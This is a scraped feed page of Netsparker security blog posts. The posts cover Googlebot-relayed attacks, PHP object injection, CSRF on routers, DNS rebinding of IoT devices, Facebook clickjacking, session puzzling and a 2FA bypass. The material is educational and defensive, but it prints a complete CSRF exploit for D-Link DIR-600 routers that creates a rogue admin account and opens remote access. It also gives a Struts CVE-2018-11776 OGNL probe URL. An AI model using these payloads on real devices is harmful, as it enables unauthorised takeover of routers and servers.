Quantcast
Channel: Invicti
Viewing all 1027 articles
Browse latest View live

Using Google Bots as an Attack Vector

$
0
0

According to the statistics, Google always has a market share of more than 90% among search engines. Many users use their address bar as Google’s search bar. Therefore, being visible on Google is crucial for websites as it continues to dominate the market.

Using Google Bots as an Attack Vector

In this article, we analyze a study from F5 Labs which brings our attention to a new attack vector using Google's crawling servers, also known as Google Bots. These servers gather content from the web to create the searchable index of websites from which Google's Search engine results are taken.

How Search Engines Use Bots to Index Websites

Each search engine has unique sets of algorithms, but the common thing they do is to visit any given website, look at the content and links they find (known as 'crawling'), then grade and list the resources. After one of these bots finds your website, it will visit and index it.

For a good ranking, you need to make sure that search engine bots can crawl your website without issues. Google specifically recommends that you avoid blocking search bots in order to achieve successful indexing. Attackers are aware of these permissions and have developed an interesting technique to exploit them – Abusing Google Bots.

The Discovery of a Google Bot Attack

In 2001, Michael Zalewski wrote in Phrak magazine about this trick. He also highlighted how difficult it is to prevent it. Just how difficult became apparent 17 years later, when F5 Labs inspected the CroniX crypto miner. When F5 Labs' researchers analyzed some malicious requests they had logged, they discovered that the requests originated from Google Bots.

Initially, the F5 Labs researchers assumed that an attacker used the Google Bot's User-Agent header value. But when they investigated the source of the requests, they discovered that the requests were indeed sent from Google.

There were different explanations for why Google servers would send these malicious requests. One of them would be that Google's servers were hacked. However, that idea was discarded quickly as it wasn't likely. Instead they focused on the scenario laid out by Michael Zalewski, who stated that Google Bots are abused in order to make them behave maliciously.

How Did the Google Bots Turn Evil?

Let’s take a look at how attackers can abuse Google Bots in order to use them as a tool for malicious intent.

First, let's suppose that your website contains the following link:

<a href="http://victim-address.com/exploit-payload">malicious link<a>

When Google Bots encounter this URL, they’ll visit it in order to index it. The request that includes the payload will be made by a Google Bot. This image illustrates what happens:

Using Google Bots as an attack vector diagram

The Experiment Conducted to Prove the Attack

Researchers verified the theory that a Google Bot request would carry the payload, by conducting an experiment in which they prepared two websites: one that acted as the attacker, and one that acted as the target. The links that carried the payload were added to the attacker's website and then sent to the target website.

Once the researchers set the necessary configurations for the Google Bots to browse the website, they then waited for the requests from the Google Bots. When they analyzed the requests, they found out that the requests from the Google Bot servers indeed carried the payload.

The Limits of the Attack

This scenario is only possible in GET requests where the payload can be sent through the URL. Another drawback is that the attacker won't be able to read the victim server's response, which means that this attack is only practical if it's possible to send the response out of bounds, like with a command injection or an SQL injection.

The Combination of Apache Struts Remote Code Evaluation CVE-2018-11776 and Google Bots

Apache Struts is a Java-based framework released in 2001. The regular discovery of code evaluation vulnerabilities in the framework generated many discussions about its security. For example, the Equifax Breach that facilitated the loss of $439 million and the theft of a huge amount of personal data, was the result of CVE-2017-5638, a critical code execution vulnerability found in the Apache Struts framework.

A Quick Recap of Apache Struts Remote Code Evaluation CVE-2018-11776

Let’s recap on the vulnerability that can be exploited on recent Apache Struts versions. The CVE-2018-11776 vulnerability (discovered in August this year) is perfect for a Google Bot attack, since the payload is sent through the URL. Not surprisingly, this was the vulnerability that CroniX abused.

Example

Here are two examples:

When a namespace is not set, the configuration that leads to the vulnerability allows user-defined namespaces to be set from the path. In this situation it's possible to inject an OGNL (Object-Graph Navigation Language) expression. OGNL is an expression language in Java.

Here is an example of a configuration that is vulnerable to CVE-2018-11776:

<struts>
<constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />

<package name="default" extends="struts-default">

<action name="help">
  <result type="redirectAction">
      <param name="actionName">date.action</param>
  </result>
</action>
..
..
.
</struts>

You can use the following sample payload to confirm the existence of CVE-2018-11776. If you open the URL http://your-struts-instance/${4*4}/help.action and you get redirected to http://your-struts-instance/16/date.action, you can confirm that the vulnerability exists.

As mentioned before, this is the perfect context for a Google Bot attack. As CroniX shows, attackers can go as far as spreading Cryptomining malware using a combination of Apache Struts CVE-2018-11776 and Google Bots.

Solutions to the Google Bots Attack

At this point, the possibility of malicious links directed to your website from Google Bots should make you question which third-parties you can really trust. Yet, blocking Google Bot requests entirely would negatively influence your position in the search engine's results. If Google Bots cannot browse your website, this will pull down your ranking in the search results. So if your application detects malicious requests and blocks them, or even blocks the sending IP, attackers could use the Google Bot requests to send malicious payloads, which would result in blocked Google Bots, and therefore further damage your search result rankings.

Control the External Connections on Your Website

Attackers can use their websites, or those under their control, to conduct malicious activity using Google Bots. They might also place links on a website in comments under blog posts.

If you want an overview of the external links on your website, you can check the Out-of-Scope Links node in the Netsparker Knowledge Base following a scan.

Out of Scope Links

The Correct Handling of Links Added by Users

Even though it won't prevent attackers from abusing Google Bots to attack websites, you might still be able to prevent a negative Search Engine Ranking if you take certain precautions. For example, you can prevent search bots from following links using the rel attribute in combination of nofollow. This is how it's done:

<a rel="nofollow" href="http://www.functravel.com/">Cheap Flights</a>

Due to the 'nofollow' value of the rel attribute, the bots will not visit the link.

Similarly, the meta tags you define between the <head></head> tags will help control the behavior of the search bots on all URLs found on the page.

<meta name="googlebot" content="nofollow" />
<meta name="robots" content="nofollow" />

You can give these commands using the X-Robots-Tag response header, too:

X-Robots-Tag: googlebot: nofollow

You should note that the commands given with X-Robots-Tag and meta tags apply to all internal and external links.

Further Reading

Read more about the research on the Google Bots attack in Abusing Googlebot Services to Deliver Crypto-Mining Malware.

Authors, Netsparker Security Researchers:

Ziyahan Albeniz
Umran Yildirimkaya
Sven Morgenroth


Sven Morgenroth Talks About PHP Object Injection Vulnerabilities on Paul's Security Weekly Podcast

$
0
0

Sven Morgenroth, a security researcher at Netsparker, was interviewed by Paul Asadoorian and Larry Pesce for Paul's Security Weekly #584. Sven talked about PHP Object injection vulnerabilities and explained the dangers of PHP's unserialize function. Sven's talk was divided into three sections: some background, a technical demo and a final focus on vulnerabilities

  • To begin with, Sven asked and answered some basic questions. What are PHP objects and how are they are created? What does the corresponding object look like? How are they stored? What are objects used for? Sven looked at the common operations of PHP objects, as well as their 'magic methods' – class methods that allow the execution of certain functions based on how objects are used.
  • During his demo, Sven showed the format of serialized PHP Objects, explained PHP's magic methods, and walked us through how to write an exploit for a PHP Object Injection vulnerability.
  • Sven pointed out that their vulnerability issues lie with both the properties and the magic methods. This kind of vulnerability is not unique to PHP. Python, Ruby and Java share similar problems. In some respects, the vulnerability in these languages is worse than PHP; in other aspects PHP is worse. Sven concluded with the vital question of what you can do to prevent these vulnerabilities:
    • Don't pass user controlled input to unserialize
    • Often you can use json_encode or json_decode
    • If you need to store it somewhere where a user could change it, like in a form field, use an HMAC

For those who want more information about PHP Object injection, read Sven's other blog post, Why You Should Never Pass Untrusted Data to Unserialize When Writing PHP Code.

The Importance of the Content-Type Header in HTTP Requests

$
0
0

Dawid Czagan, Founder and CEO at Silesia Security Labs and author of Bug Hunting Millionaire, is listed in HackerOne’s Top 10 Hackers. In a recent article on his website, Czagan disclosed the details of a vulnerability combining both Cross-site Request Forgery (CSRF) and Remote Code Execution (RCE) on routers, that led him to discover and gain access to the machines within the network of the router.

The Importance of the Content-Type Header in HTTP Requests

During his discovery, Czagan found out that the web interface of D-Link DIR-600 routers were vulnerable to a CSRF vulnerability. While CSRF is no longer listed in OWASP’s Top 10, it is still a significant problem.

Taking a Look at the Exploit Code

The exploitation of a CSRF vulnerability requires user interaction. This means that attackers have to trick their victims into clicking on a malicious link, whose HTML code will make the victim’s browser issue requests on their behalf.

We should take a closer look at the two compulsory requests made from the target’s browser to understand the vulnerability. Let’s name these REQ 1 and REQ 2 respectively.

Here is REQ 1:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.0.1/hedwig.cgi", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "text/plain; charset=UTF-8");
    xhr.withCredentials = "true";
        var body = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>"+
"<postxml>"+
  "<module>"+
    "<service>DEVICE.ACCOUNT</service>"+
    "<device>"+
      "<account>"+
        "<seqno/>"+
        "<max>1</max>"+
        "<count>2</count>"+
        "<entry>"+
          "<name>admin</name>"+
          "<password>==OoXxGgYy==</password>"+
          "<group>0</group>"+
          "<description/>"+
        "</entry>"+
        "<entry>"+
          "<name>admin2</name>"+
          "<password>pass2</password>"+
          "<group>0</group>"+
          "<description/>"+
        "</entry>"+
      "</account>"+
      "<session>"+
        "<captcha>0</captcha>"+
        "<dummy/>"+
        "<timeout>180</timeout>"+
        "<maxsession>128</maxsession>"+
        "<maxauthorized>16</maxauthorized>"+
      "</session>"+
    "</device>"+
  "</module>"+
  "<module>"+
    "<service>HTTP.WAN-1</service>"+
    "<inf>"+
      "<web>2228</web>"+
      "<weballow>"+
        "<hostv4ip/>"+
      "</weballow>"+
    "</inf>"+
  "</module>"+
  "<module>"+
    "<service>HTTP.WAN-2</service>"+
    "<inf>"+
      "<web>2228</web>"+
      "<weballow>"+
        "<hostv4ip/>"+
      "</weballow>"+
    "</inf>"+
  "</module>"+
"</postxml>";
        xhr.send(body);
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request1" onclick="submitRequest();" />
    </form>
  </body>
</html>

Let’s begin analyzing the first request. The emboldened line is the crucial point in the vulnerability. But first, we have to find out the purpose of the entire request. Two admin accounts are added in the request. The first admin is the default administrator account with the password '==OoXxGgYy==', which is readily present. There are no changes made to that account. admin2 with the password 'pass2' is the new administrator account added due to the vulnerability. Additionally, remote access control authentication was allowed through port 2228 in the attack.

Here is REQ2:

<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.0.1/pigwidgeon.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = "true";
var body = "ACTIONS=SETCFG%2CSAVE%2CACTIVATE";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="Submit request2" onclick="submitRequest();" />
</form>
</body>
</html>

In the second request, the URL encoded SETCFG, SAVE, ACTIVATE action commands sent in REQ2 allow the activation of the settings in REQ1.

The Role of Routers in the CSRF Attack

The next step the attacker has to take is to discover the IP address of the target machine with the admin account and remote access port they obtained. The attacker does this by pinging the server it owns over the router interface using this code:

<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.0.1/diagnostic.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = "true";
var body = "act=ping&dst=X.Y.Z.W";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="Submit request3" onclick="submitRequest();" />
</form>
</body>

Note: 'X.Y.Z.W' is the IP address of the attacker’s device.

Cross-site Request Forgery in Routers

Now that we understand the logic behind the attack, we can observe the details that make the Cross-site Request Forgery vulnerability unique in this case. The REQ1 has an important role in the exploit of the vulnerability because the request generates a new admin account and configures the remote control access port. You should note that the payload has the XML format but the emboldened line in REQ1 states that the request type is set as text/plain instead of application/xml:

xhr.setRequestHeader("Content-Type", "text/plain; charset=UTF-8");

Had the system developers enforced a content-type compatible with the data type they expect, such as XML, the exploitation of this vulnerability would be not be possible.

This is because in AJAX/XHR requests, the browsers send a preflight request using the OPTIONS method to control whether the request is accepted or not in the recipient server, before sending the main request. This request is sent in the following circumstances:

  1. If the request uses a method other than GET, HEAD, and POST
  2. If the Content Type is set to something other than application/x-www-form-urlencoded, multipart/form-data, text/plain types in POST requests
  3. If a custom header was set in the request

This control and detection mechanism is known as the CORS Preflight Request. Since the router wouldn’t send a positive response to REQ1, the CSRF request wouldn’t go through and the attack would fail.

The details on Same-origin Policy (SOP) and Cross Origin Resource Sharing (CORS) can be found on our whitepaper titled The Definitive Guide to Same-origin Policy.

Content-Type Header in Security

Setting the Content-Type header properly is very critical. This header is added to request and response headers since HTTP 1.0. You can manipulate the way the server will interpret the request by setting Content-Type in request headers. Similarly, you can choose how the program will process the response using Content-Type in response headers.

For example, in an HTTP response if the Content-Type is text/html, the HTML tags are rendered in the browser, displaying the result of the rendered HTML tags on the webpage.

In fact, to avoid Content Type Sniffing attacks, you must set the Content-Type header properly in the HTTP response.

Missing Content-Type Header

Make sure to give the required emphasis on the Content-Type header in all HTTP requests and responses. Do not accept the formats other than expected. The HTTP Security Headers Whitepaper can help you set the necessary headers to establish the security of your websites.

Further Reading

You can read more about the vulnerability in Czagan’s article, From CSRF to Unauthorized Remote Admin Access.

Netsparker Sponsors OWASP AppSec California 2019

$
0
0

Netsparker is sponsoring and exhibiting at OWASP AppSec California 2019. The conference will take place from January 24th to 25th at the Annenberg Community Beach House, Santa Monica, California.

OWASP AppSec California 2019

Join Us at Booth 27 at OWASP AppSec California 2019

Come and visit us at Booth 27 in the exhibitor area, to learn how our Proof-Based Scanning Technology can help you save both time and money when automatically detecting vulnerabilities in the OWASP Top 10 list.

For more information about the conference, visit the official OWASP AppSec California 2019 website.

30% Off Promotional Code for OWASP AppSec California 2019!

Use the Promotional Code Netsparker-30offwhen buying your OWASP AppSec California 2019 Conference Ticket, to get a 30% discount.

Discovering and Hacking IoT Devices Using Web-Based Attacks

$
0
0

DNS rebinding attacks have been the topic of ongoing discussion for twenty years. Despite their efforts, browser vendors still can’t find a stable defence against these attacks. They were reported to have been be fixed eight years ago. However, this type of attack has resurfaced against a new attack vector.

Discovering Hacking IoT Devices Using Web Based Attacks

In general, it’s safe to say that the upcoming trend for malicious hackers will consist of a combination of multiple existing attacks, forming new attack vectors. The DNS rebinding attack that made the cryptocurrency wallets vulnerable is a good example of these new attack vectors.

In this article, we discuss the research conducted at Princeton and UC Berkeley on web-based attacks carried out against Internet of Things (IoT) devices which led to the discovery, hacking and takeover of these devices. The research was published in August, 2018.

Devices and Methods Used in the Discovery and Hacking of IoT Devices Research

Researchers aimed to test 15 IoT devices. Only seven of these devices were found to have local HTTP servers, so the research focused on them. They included: Google Chromecast, Google Home, a smart tv, a smart switch, and three cameras.

The attack method they used aimed to:

  1. Deceive the victim in order to make them visit an attacker controlled website
  2. Discover the IoT devices on the victim’s local network
  3. Take control of them using web-based attacks.

The Duration of the Attack

Technically, this isn’t a new vector. The research paper cited earlier studies that discovered that it takes a minute, on average, for attackers to use these attack vectors to get results. Curiously, the results of a well-known study (What You Think You Know About the Web is Wrong) revealed that 55% of users spend no more than 15 seconds on a website. It appears that most users will not be affected by the IoT vulnerability.

However, in the Princeton and UC Berkeley study, researchers significantly decreased the duration of the attack. They stated that, using the method they discovered, devices in the local network could be discovered and accessed quicker than the previous studies – except in the case of Chrome, as it caches DNS requests and ignores the TTL, if it's under a certain threshold. It is important to note that devices in a Demilitarized Zone (DMZ, internal network, behind a firewall) are generally considered to be secure, because users assume that outsiders cannot reach these devices. However, in the attack described here, the attacker already had access to the browser in the victim’s internal network!

The Discovery of HTTP Endpoints

Researchers analyzed the devices by connecting them to a Raspberry Pi wireless access point. The packets sent to and received from the devices, and the packets sent to and received from the mobile applications tied to each device, were observed and analyzed. As a result of this analysis, 35 GET request endpoints and eight POST request endpoints were discovered. These endpoints were used to identify the IP addresses in the discovery phase of the research.

Phases of the IoT Devices Research

Researchers conducted the study in two different phases, Discovery and Access:

  • The Discovery phase aimed to find IoT devices on the local network that contained HTML5 elements on the browsers
  • The Access attack phase aimed to reach the HTTP endpoints using DNS rebinding and discovered IP addresses

Discovery Phase: Identifying the IoT Devices

These are the steps taken in the Discovery attack phase of the study:

  1. Obtain local IP address with WebRTC.
  2. Send requests to all IP addresses within the IP range on port 81. Since port 81 isn’t generally used, active devices would respond with a TCP RST packet immediately. For non-active devices on the IP range, the request packets would time-out.
  3. Each active IP address received the requests collected at the initial phase for the 35 GET endpoints using HTML5. Depending on the error messages returned, the attack script discovered whether the IP address matched with any of the seven devices.

The researches planned to use three different operating systems (Windows 10, MacOS, and Ubuntu) and four different browsers (Chrome, Firefox, Safari, Microsoft Edge). However, Chrome and Firefox were the only two browsers that were a suitable fit for the study. Therefore, Safari and Edge browsers were discontinued because (Web-based Attacks to Discover and Control Local IoT Devices):

On Safari, all the Fetch requests timed out, so the attack script considered all IP addresses as inactive. In contrast, the script could use Fetch to correctly identify the active IP addresses on Edge, but the Edge browser did not expose detailed HTML5 error messages. Thus, the attack script was unable to identify any devices on Edge.

Access Phase: Taking Control of the IoT Devices

Here are the steps in the Access attack phase of the study:

  1. The victim visits the attacker controlled domain (domain.tld) and the victim’s browser executes the malicious JavaScript found on the attacker’s site. The domain still resolves to the attacker’s server IP.
  2. JavaScript requests another resource on domain.tld that is only present on the attacker's server (e.g. the message 'hello' on http://domain.tld/hello.php).
  3. If the victim’s local DNS cache still resolves to the attacker’s remote IP, the result of the query to /hello.php will yield the string 'hello', and the JavaScript repeats step 2.
  4. However, if domain.tld is expired in the victim’s cache, a new DNS query will be sent to the attacker’s name server.
  5. Eventually, instead of the attacker’s remote IP, the local IP obtained from the Discovery attack will be returned, and /hello.php won't reply with the string 'hello', but with something different, like a 404 error, which tells the malicious script that the DNS rebinding attack was successful.

As a result of this attack, the malicious script circumvented the Same-Origin Policy and gained access to the web application running on the device. Now the attacker could reboot and launch video or audio files on Google Chromecast, Google Home, the smart TV, and smart switch devices.

How to Prevent DNS Rebinding Attacks on IoT Devices

According to the researchers, the user, browser vendors, IoT manufacturers, and DNS providers each have to take precautions in order to avoid a DNS rebinding attack. Here are some of the countermeasures listed in the research:

  1. The user can disable WebRTC on their browser, and prevent private IPs from disclosure. The attacker will then be able to discover the user’s private IP by sending requests to all the *.1 addresses (router’s address) in the private IP range.
  2. The attacker assumes that all the IoT devices have the same IP range as the victim's PC. The user can configure their home router's DHCP server to give out IP addresses on another subnet, such as /16.
  3. The user can install dnsmasq, which prevents DNS rebinding by dropping the RFC 1918 address from DNS replies. The user can also use OpenWRT routers which use dnsmasq.
  4. IoT manufacturers can control the Host header in the requests sent to web interfaces. If there isn’t a private IP that complies with RFC 1918, they can block access.
  5. DNS providers can use a mechanism such as dnswall to filter private IPs from DNS replies.
  6. The browser vendors can develop extensions that limits the access of public websites to private IP ranges.

Further Information

For further information on the Princeton and BC Berkeley research discussed in this blog post, see Web-based Attacks to Discover and Control Local IoT Devices.

To read more about web based attack vectors on applications and devices inside your local network, see Vulnerable Web Applications on Developers' Computers Allow Hackers to Bypass Corporate Firewalls.

Authors, Netsparker Security Researchers:

Ziyahan Albeniz
Sven Morgenroth
Umran Yildirimkaya

Clickjacking Attack on Facebook: How a Tiny Attribute Can Save the Corporation

$
0
0

The clickjacking attack introduced in 2002 is a UI Redressing attack in which a web page loads another webpage in a low opacity iframe, and cause changes of state when the user unknowingly clicks on the buttons of the webpage. In this article, we explain how the Clickjacking attack works and the importance of the X-Frame-Options header, including a discussion of a recent discovery by a researcher who found a Clickjacking attack on Facebook.

Introduction to Clickjacking

This type of attack was ignored until 2008, when the inventors of the attack, Jeremiah Grossman and Robert Hansen, acquired authorization on a victim’s computer through Adobe Flash by using a Clickjacking attack. Grossman originally named this attack by combining the words 'click' and 'hijacking'. The name 'Clickjacking' passed through different categorizations and name changes since. For example, the attack in which an attacker collected likes for his own post using the Clickjacking method was later known as 'LikeHijacking'.

Although the Clickjacking attack has been prevented with methods such as Frame Busting, the most effective defense against these attacks was introduced by Microsoft in 2009. With the release of Internet Explorer 8, Microsoft released the X-Frame-Options (XFO) HTTP response header. Right after the announcement all major browsers implemented this header, and in 2013 RFC 7034 was released.

How Does the Clickjacking Attack Work?

The Clickjacking attack method works by loading the target website inside a low opacity iframe and overlaying it with an innocuous looking button or link. This then tricks the user into interacting with the vulnerable website beneath by forcing the user to click the apparently safe UI element, triggering a set of actions on the embedded, vulnerable website.

In this example, Amazon is loaded in a low opacity iframe and is therefore not visible by the user. The user sees the Click Here button. Once they click on it, however, only the Buy button on Amazon is actually clicked, triggering a set of actions on Amazon. (Please note, that Amazon is not vulnerable to clickjacking, and this is merely an example of how it would work.)

Since these interactions take place as if the victim was intentionally browsing the website, the interaction triggered on Amazon will also include the victim’s credentials (such as Cookies).

The Clickjacking Bug on Facebook

On December 21, a security researcher reported his investigation where he saw suspicious posts shared on his friends’ Facebook walls and uncovered a scam campaign. When he clicked on a link that directed him to a comics website, he was asked to confirm his age. After confirming his age, he was redirected to the comics website, but the post was also published on his Facebook wall without any action on his part.

The researcher discovered an iframe and acquired the source code. He found out that these frames ended up on this Facebook URL:

https://mobile.facebook.com/v2.6/dialog/share?app_id=283197842324324&href=https://example.com&in_iframe=1&locale=en_US&mobile_iframe=1

When you click on this link, you’re prompted to share the content on your wall.

What’s interesting is that the researcher realized that the XFO header was set properly on the page. That would normally stop any iframes (even Facebook pages) loading on the page:

X-Frame-Options: DENY

The researcher proceeded to check whether the X-Frame-Options header was implemented correctly on all major browsers. He confirmed that they all worked as expected. Next, he checked whether the built-in browser in Facebook’s Android app implemented the XFO header correctly. It turned out that the XFO response header was not set when the user logged in to Facebook from a mobile device.

How Did Facebook Respond to the Clickjacking Attack?

Facebook refused to fix this issue, but as a precaution, it created a second prompt page to give users control over whether they wanted to proceed with the share.

So, how does Facebook's fix work? Whenever you click the button to share the post, the second confirmation page opens in a new tab. It asks you whether you want to share the message and lets you choose the people you want to share the link with. The new page opens due to the “_blank” value added to the target attribute in the href element on the first page. Whenever it is set, the linked page behind the link is opened in a new tab. This results in a thwarted clickjacking attack. This is because, the new tab correctly implements the X-Frame-Options: DENY feature.

It's hard to say why Facebook decided to open a completely new tab to share a message. This makes sharing just a tiny bit more inconvenient. For a company like Facebook, that aims to make sharing content as effortless as possible, this sounds like a terrible fix. I wouldn't be surprised if this was only a temporary solution or if Facebook actually used this second page as extra advertising space.

How to Properly Prevent Clickjacking Attacks in Your Web Applications

In order to protect users from UI Redressing attacks like Clickjacking, the best tactic is to prevent malicious websites from framing pages to render with iframes or frames. The most effective method is by using the X-Frame-Options HTTP security header.

X-Frame Options Directives

There are three X-Frame-Options directives available.

X-Frame-Options: DENY | SAMEORIGIN | ALLOW-FROM URL
DirectiveDescription
DENY:The page must not be embedded into another page within an iframe or any similar HTML element.
SAMEORIGIN:The website can only be embedded in a site that’s paired in terms of scheme, hostname and port. For example, https://www.example.com can only be loaded through https://www.example.com, while https://www.attacker.com, and even http://example.com, are not allowed to embed it.

For further information about Same-Origin Policy, see Introducing the Same-Origin Policy Whitepaper.
ALLOW-FROM URL:

The website can only be framed by the URL specified or whitelisted here.

There are two important points to remember with X-Frame-Options:

  • Chromium based browsers only partially support X-Frame-Options (the ALLOW-FROM directive is unavailable)
  • Using the ALLOW-FROM URL instruction, we can whitelist only one domain and allow our website to be loaded in an iframe.

Important Points About the X-Frame-Options HTTP Header

  • The X-Frame-Options header must be present in the HTTP responses of all pages
  • Instead of X-Frame-Options, the Content-Security-Policy frame-ancestors directive can be used:
Content-Security-Policy: frame-ancestors 'none'; // No URL can load the page in an iframe.
Content-Security-Policy: frame-ancestors 'self'; // Serves the same function as the SAMEORIGIN parameter.
Content-Security-Policy: frame-ancestors https://www.example.com;

This serves the same function as the ALLOW-FROM instruction. The most important thing is that you can whitelist more than one URL by using this instruction.

Content-Security-Policy: frame-ancestors https://www.example.com https://another.example.com;

Two Interesting Session-Related Vulnerabilities

$
0
0

Sessions are an essential part of most modern web applications. This is why session-related vulnerabilities often have a sizable impact on the overall security of a web application. They frequently allow the impersonation of other users and can have other dangerous side effects.

Two Interesting Session-Related Vulnerabilities

What Are Session Variables?

For those not familiar with session variables, they are server-side variables whose value is tied to the current session. This means that if a user visits the website, you could store their username in the session variable as they log in and it will be available until the session expires or the user logs out. If another user logs in, that triggers a new session and the session variable will return a different username for that particular user.

Session Variable Example

Let's take a look at an example of how session variables work. Be aware that this example uses stripped-down pseudocode to help illustrate an otherwise complicated concept. Do not use anything like this in production!

Login

user = getUser(input['username']);
if(compare_hash(input['password'], user.hash) === true) {
session['username'] = user.name;
session['logged_in'] = true;
return true;
} else {
session['logged_in'] = false;
return false;
}

Index

if(session['logged_in'] === true) {
print('Hello ' + sanitize(session['username']))
}

If a user called Alice logged in, she would be greeted with "Hello Alice". If Bob was logged in at the same time and opened the same page, he would see "Hello Bob" instead. The session variable is available across different files and isn't restricted to file it is declared in. This can lead to a complication.

Session Puzzling

In this example, we're going to look at three different files. Try to spot the problem in the code before you continue reading the article. Also, not that this example contains vulnerable pseudocode. Do not use anything like this in production!

Login (snippet)

01 // check if phone number is confirmed
02 if(user.phone_number_confirmed ===true) {
03  // set the `confirmed` session variable to true since we need to check it later
04  session['confirmed'] = true;
05 }
06 // the user wants to get notified if somebody logs in to their account?
07 if(user.notify_on_login ===true) {
08  // we need to check this as well
09  session['notify_on_login'] = true;
10 }

Index (snippet)

01 // we handle the login notifications here
02  if(session['notify_on_login'] ===true) {
03  var message = 'Somebody just logged into your account.';
04  // if the phone number is confirmed...
05  if(session['confirmed'] ===true) {
06  // we send an SMS text message
07   sendTextMessage(message);
08  // if the phone number is not confirmed
09   } else {
10  // we send an email instead
11   sendEmail(message);
12   }
13  }

Admin (snippet)

01  // if the user submitted a password
02  if(input['password'] !==null) {
03   // check if it matches the one that's required to access the admin panel
04  var result = check_admin_password(input['password']);
05   // if it's correct...
06   if(result ===true) {
07  // confirm that the user was logged in
08   session['confirmed'] = true;
09   } else {
10   // set the confirmation to false
11   session['confirmed'] = false;
12   }
13  }
14  // if the user didn't supply the correct password
15  if(session['confirmed'] !==true) {
16   print('You must proof that you are allowed to visit the admin section.')
17   print('Please type in the password.');
18  // generate a password form and just exit
19   generatePasswordForm();
20   exit();
21  // if the user supplied the right password....
22  } else {
23   // load the admin section and grant access
24   loadAdminSection();
25  }

Did you spot the vulnerability? If you found it, then congratulations! But don't worry if you couldn't spot it right away. We'll explain what went wrong in the above code.

  • Let's summarize the login snippet. What happens here is that we check whether or not the user wants to be notified whenever someone logs into their account. It also checks whether or not the phone number has been confirmed in line 2. If that's the case, the confirmed session variable is assigned the value 'true'.
  • In the index snippet, we see why this session variable is used. If the user wants to get notified when someone logs into their account, it checks the confirmed variable in line 5 and sends an SMS in line 7 if the user has confirmed their phone number. If there is no confirmed phone number, it will send an email instead.
  • The actual problem arises in the admin snippet. In the lines 2-13, it checks whether or not a password was supplied and sets a session variable to 'true' if the password matches the one that's needed to access the admin section of the website. However, if you take a closer look you will see that this session variable has the same name ('confirmed') as the one that's being used to check whether or not the user confirmed their phone number. In line fifteen, it checks whether or not the confirmed session variable is 'false' (or undefined). And if it's set to 'true' it will load the admin section in line twenty-four.

We don't need to know the password here. When we confirm our phone number, the confirmed session variable will be set to 'true' in line 4 of the login snippet. So if our phone number is confirmed, we can also access the admin panel without typing in a password. The problem here is that session variables are valid across files and that we use the same variable name for different functionality. This is called Session Puzzling.

Bypassing Two-Factor Authentication by Taking Advantage of Missing Access Controls

Two-Factor Authentication (2FA) is a security feature that prevents your account from being stolen if an attacker knows your password. The website you're logging into requires you to provide a second code, in addition to your normal password. Ideally this code has been generated by using a Time-based One-Time Password (TOTP) algorithm. In most cases, if you enable 2FA, the website provides you with a string of letters and numbers, or a QR code that you need to scan or type into an app on your phone. It will also provide you with some backup code, in case you lose access to your phone.

The app will then continuously generate a new, additional password based on the secret code and the current UNIX timestamp. Usually, these additional passwords are regenerated every 30 seconds (think Google Authenticator). The idea behind this is that it may be possible for an attacker to retrieve your password by various means, but it's often infeasible for them to gain possession of the device on which your second code (2FA) is generated. In addition to smartphones, there are also dedicated hardware devices that can be used for generating these codes.

The question for an attacker is: can 2FA be bypassed?

In a lot of cases, the answer is 'yes'. TOTP is not the only method websites use to implement 2FA. Some use emails that contain the code, while others use an SMS or a phone call. Because consumers reuse passwords, the website password and the email account password are often the same word. Therefore, an attacker can simply log into the email account and read the code. Using different techniques and tricks, attackers can also intercept SMS text messages and phone calls. My conclusion is that TOTP is the way to go.

What About the Server-Side Implementation?

However, it also depends on the server side implementation of both the algorithm and the 2FA prompt. The possibility of bypassing 2FA is not a totally new concept, but it was once again proven by Nikhil Mittal. He found a way to bypass it without even touching the underlying token generation algorithm. Instead, he used a server-side bug that was present due to careless  session handling. In this instance, it lead to an access control problem.

Since it was a private bug bounty program, Nikhil Mittal was unable to disclose its name. What he was allowed to tell was how he was able to bypass Two Factor Authentication. First he outlined what a typical 2FA login flow on the website looked like:

  1. The user provides an email address and a password
  2. A valid 2FA code is sent to the user's registered telephone number
  3. The website asks for the 2FA code
  4. The user types in the code
  5. The user is logged in

We briefly mentioned that sometimes there are backup codes. Users who lose their device or SIM card have an alternative: select the backup code option in Step 3 and use one of their backup codes.

Nikhil noticed that the websites session basically has two states:

  1. Username and password have been supplied correctly, but the 2FA code has not yet been provided
  2. Username, password and the 2FA code have all been supplied correctly

Obviously, you have unlimited access to all settings if are in the second state. You can regenerate your backup codes and edit other settings too. But are users in the first state really limited to typing in their 2FA token?

Nikhil Mittal was curious about whether he would be able to access other functionality in the first state. So, he issued a request to the website that would return the backup codes if he were in the second state. The expected behaviour is that the application would throw an error due to missing privileges. The surprise was that it returned the backup codes! That meant that he was simply able to log in with the correct username and password, retrieve the user's backup codes, select the option to use them instead of the actual 2FA code and then supply one of the stolen ones. This immediately granted him access to the account – Two Factor Authentication was bypassed.

For further information about the vulnerability he found, and what requests he issued in order to retrieve the backup tokens, we highly recommend reading Nikhil Mattal's writeup, How I bypassed 2-Factor Authentication in a bug bounty program.

December 2018 Update for Netsparker Standard

$
0
0

